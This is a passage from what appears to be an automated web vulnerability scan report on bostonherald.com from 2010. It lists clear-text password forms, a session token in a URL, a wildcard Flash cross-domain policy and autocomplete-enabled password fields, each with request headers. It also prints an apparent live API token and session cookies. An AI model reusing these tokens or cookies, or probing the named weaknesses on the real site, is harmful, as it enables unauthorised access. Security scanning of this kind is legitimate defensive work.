Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4

The form contains the following password fields:

password
confirm_password

Request

GET /sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.24. http://bostonherald.com/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.25. http://bostonherald.com/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6

The form contains the following password fields:

password
confirm_password

Request

GET /track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.26. http://bostonherald.com/users/login previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/users/login?returnto=/users/

The form contains the following password field:

password

Request

GET /users/login HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.27. http://bostonherald.com/users/register previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/users/register/

The form contains the following password fields:

password
confirm_password

Request

GET /users/register HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

3.28. http://bostonherald.com/users/register/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bostonherald.com/users/register/

The form contains the following password fields:

password
confirm_password

Request

GET /users/register/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

4. Session token in URL previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://bostonherald.com
Path:	/entertainment/movies/

Issue detail

The response contains the following links that appear to contain session tokens:

http://nmp.newsgator.com/NGBuzz/Buzz.ashx?buzzId=149584&apiToken=2B2E7D0407C94C67BA38AB2091B68BCD&mode=production&aid=bostonher&zip=02118&radius=5&units=mi&country=USA&trkM=AB137F30-E300-46C0-881C-286B26F890DA

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /entertainment/movies/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

5. Flash cross-domain policy previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: bostonherald.com

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:07 GMT
Server: Apache
Last-Modified: Wed, 23 Jan 2008 23:45:32 GMT
Accept-Ranges: bytes
Content-Length: 277
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bostonherald.com" />
<allow-access-from domain="*.heraldinteractive.com" />
...[SNIP]...

6. Password field with autocomplete enabled previous next
There are 28 instances of this issue:

/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also
/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also
/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5
/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also
/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also
/news/columnists/view.bg
/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also
/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also
/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also
/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also
/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also
/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also
/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also
/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also
/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1
/news/regional/view.bg
/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3
/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2
/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also
/sports/football/patriots/view.bg
/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0
/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also
/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4
/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also
/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6
/users/login
/users/register
/users/register/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

6.1. http://bostonherald.com/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.2. http://bostonherald.com/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=home&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.3. http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.4. http://bostonherald.com/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.5. http://bostonherald.com/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/jobfind/news/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=home&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.6. http://bostonherald.com/news/columnists/view.bg previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view.bg

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/news/columnists/view.bg?articleid=1294590&format=comments&srvc=news&position=3

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.7. http://bostonherald.com/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/format=comments&srvc=home&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.8. http://bostonherald.com/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/news/columnists/view/20101107puerto_rican_vets_seek_honor/format=comments&srvc=news&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.9. http://bostonherald.com/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/news/international/americas/view/2010110720_killed_over_weekend_in_mexican_border_city/format=comments&srvc=news&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.10. http://bostonherald.com/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/news/national/northeast/view/20101107jury_in_connecticut_home_invasion_case_back_for_3rd_day/format=comments&srvc=news&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.11. http://bostonherald.com/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/news/offbeat/view/20101107dont_worry_mother_im_coming_to_save_you/format=comments&srvc=news&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.12. http://bostonherald.com/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/news/opinion/op_ed/view/20101107dems_find_way_to_ignore_voters_will/format=comments&srvc=news&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.13. http://bostonherald.com/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/news/police_logs/view/20101105caught_green_handed/format=comments&srvc=news&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.14. http://bostonherald.com/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/news/politics/view/20101107moneybags_menino/format=comments&srvc=news&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.15. http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.16. http://bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/news/regional/view.bg?articleid=1294599&format=comments&srvc=news&position=2

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.17. http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.18. http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.19. http://bostonherald.com/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/news/regional/view/20101107teen_mom_due_in_court_for_allegedly_tossing_infant/format=comments&srvc=news&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.20. http://bostonherald.com/sports/football/patriots/view.bg previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/sports/football/patriots/view.bg?articleid=1294646&format=comments&srvc=home&position=active

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.21. http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.22. http://bostonherald.com/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/sports/football/patriots/view/20101107gil_brandt_likes_patriots_dirty_dozen_redux/format=comments&srvc=home&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/sports/football/patriots/view/20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting/format=comments&srvc=home&position=4

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.24. http://bostonherald.com/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/track/inside_track/view/20101107rick_fox_sees_celtics_as_cream_team/format=comments&srvc=home&position=also

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.25. http://bostonherald.com/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.26. http://bostonherald.com/users/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/login

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/users/login?returnto=/users/

The form contains the following password field with autocomplete enabled:

password

Request

Response

6.27. http://bostonherald.com/users/register previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/register

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/users/register/

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

6.28. http://bostonherald.com/users/register/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/register/

Issue detail

The page contains a form with the following action URL:

http://bostonherald.com/users/register/

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

Response

7. Cross-domain POST previous next
There are 20 instances of this issue:
